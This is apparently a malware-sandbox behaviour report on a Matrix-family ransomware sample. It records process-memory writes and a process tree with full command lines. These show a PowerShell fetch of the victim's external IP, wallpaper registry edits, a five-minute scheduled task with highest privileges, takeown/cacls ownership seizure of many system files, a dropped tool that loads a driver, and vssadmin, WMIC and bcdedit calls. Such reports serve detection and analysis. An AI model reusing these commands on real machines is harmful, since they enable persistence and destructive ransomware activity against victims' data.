5044 cmd.exe powershell.exe PID 5044 wrote to memory of 3156 5044 cmd.exe powershell.exe PID 3108 wrote to memory of 2992 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 2992 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 2992 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 5064 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 5064 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 5064 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 5064 wrote to memory of 2180 5064 cmd.exe wscript.exe PID 5064 wrote to memory of 2180 5064 cmd.exe wscript.exe PID 5064 wrote to memory of 2180 5064 cmd.exe wscript.exe PID 2992 wrote to memory of 1092 2992 cmd.exe reg.exe PID 2992 wrote to memory of 1092 2992 cmd.exe reg.exe PID 2992 wrote to memory of 1092 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4252 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4252 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4252 2992 cmd.exe reg.exe PID 2180 wrote to memory of 5852 2180 wscript.exe cmd.exe PID 2180 wrote to memory of 5852 2180 wscript.exe cmd.exe PID 2180 wrote to memory of 5852 2180 wscript.exe cmd.exe PID 2992 wrote to memory of 4996 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4996 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4996 2992 cmd.exe reg.exe PID 3108 wrote to memory of 364 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 364 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3108 wrote to memory of 364 3108 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 5852 wrote to memory of 5648 5852 cmd.exe schtasks.exe PID 5852 wrote to memory of 5648 5852 cmd.exe schtasks.exe PID 5852 wrote to memory of 5648 5852 cmd.exe schtasks.exe PID 364 wrote to memory of 4712 364 cmd.exe cacls.exe PID 364 wrote to memory of 4712 364 cmd.exe cacls.exe PID 364 wrote to memory of 4712 364 cmd.exe cacls.exe PID 364 wrote to memory of 4148 364 cmd.exe takeown.exe PID 364 wrote to memory of 4148 364 cmd.exe takeown.exe PID 364 wrote to memory of 4148 364 cmd.exe takeown.exe PID 2180 wrote to memory of 5560 2180 wscript.exe cmd.exe PID 2180 wrote to memory of 5560 2180 wscript.exe cmd.exe PID 2180 wrote to memory of 5560 2180 wscript.exe cmd.exe PID 5560 wrote to memory of 5708 5560 cmd.exe schtasks.exe PID 5560 wrote to memory of 5708 5560 cmd.exe schtasks.exe PID 5560 wrote to memory of 5708 5560 cmd.exe schtasks.exe PID 364 wrote to memory of 1864 364 cmd.exe cmd.exe PID 364 wrote to memory of 1864 364 cmd.exe cmd.exe PID 364 wrote to memory of 1864 364 cmd.exe cmd.exe PID 1864 wrote to memory of 6080 1864 cmd.exe 5E68lMYn.exe PID 1864 wrote to memory of 6080 1864 cmd.exe 5E68lMYn.exe PID 1864 wrote to memory of 6080 1864 cmd.exe 5E68lMYn.exe PID 6080 wrote to memory of 5068 6080 5E68lMYn.exe 5E68lMYn64.exe PID 6080 wrote to memory of 5068 6080 5E68lMYn.exe 5E68lMYn64.exe PID 2220 wrote to memory of 7304 2220 cmd.exe vssadmin.exe PID 2220 wrote to memory of 7304 2220 cmd.exe vssadmin.exe PID 2220 wrote to memory of 7664 2220 cmd.exe WMIC.exe PID 2220 wrote to memory of 7664 2220 cmd.exe WMIC.exe PID 2220 wrote to memory of 7848 2220 cmd.exe bcdedit.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWYsCRGT.exe"2⤵PID:2864
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWYsCRGT.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWYsCRGT.exe" -n2⤵
- Executes dropped EXE
PID:648
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QhJjkUBp.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\MoyG9L18.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\MoyG9L18.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1092
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:4252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4996
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Jn3rD4AU.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Jn3rD4AU.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\JhBmmRC9.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:5852 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\JhBmmRC9.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:5560 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5708
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:4712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:6080 -
C:\Users\Admin\AppData\Local\Temp\5E68lMYn64.exe5E68lMYn.exe -accepteula "SmsInterceptStore.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""2⤵PID:5108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C3⤵PID:6904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "AssemblyList_4_client.xml" -nobanner3⤵PID:6928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "AssemblyList_4_client.xml" -nobanner4⤵
- Executes dropped EXE
PID:7976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:6944
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:3508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "behavior.xml" -nobanner3⤵PID:5560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml""2⤵PID:7184
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml" /E /G Admin:F /C3⤵PID:7800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:7172
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml""2⤵PID:7328
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml" /E /G Admin:F /C3⤵PID:7516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKESCALATIONS.xml" -nobanner3⤵PID:7396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKESCALATIONS.xml" -nobanner4⤵
- Executes dropped EXE
PID:7392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:3368
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:4044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵
- Executes dropped EXE
PID:3632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:7460
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:7280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵
- Executes dropped EXE
PID:8004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:7792
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:7960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:260
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵
- Executes dropped EXE
PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5696
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:7756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:7724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵
- Executes dropped EXE
PID:4772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:7704
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:8012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵PID:7912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:7988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "KnownGameList.bin" -nobanner4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:8036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:8032
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:8120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:8180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵
- Executes dropped EXE
PID:5832
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:8116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""2⤵PID:2824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C3⤵PID:4216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "AssemblyList_4_extended.xml" -nobanner3⤵PID:6136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "AssemblyList_4_extended.xml" -nobanner4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:7052
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:5984
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:5180
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:4324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.SIUF.xml""2⤵PID:5348
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.SIUF.xml" /E /G Admin:F /C3⤵PID:5092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.SIUF.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "WINDOWS.SIUF.xml" -nobanner3⤵PID:1536
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "WINDOWS.SIUF.xml" -nobanner4⤵
- Executes dropped EXE
PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Diagnosis\osver.txt""2⤵PID:4412
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:3796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Diagnosis\osver.txt"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "osver.txt" -nobanner3⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "osver.txt" -nobanner4⤵
- Executes dropped EXE
PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log""2⤵PID:5996
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log" /E /G Admin:F /C3⤵PID:6228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edb.log" -nobanner3⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edb.log" -nobanner4⤵
- Executes dropped EXE
PID:5876
-
-
-
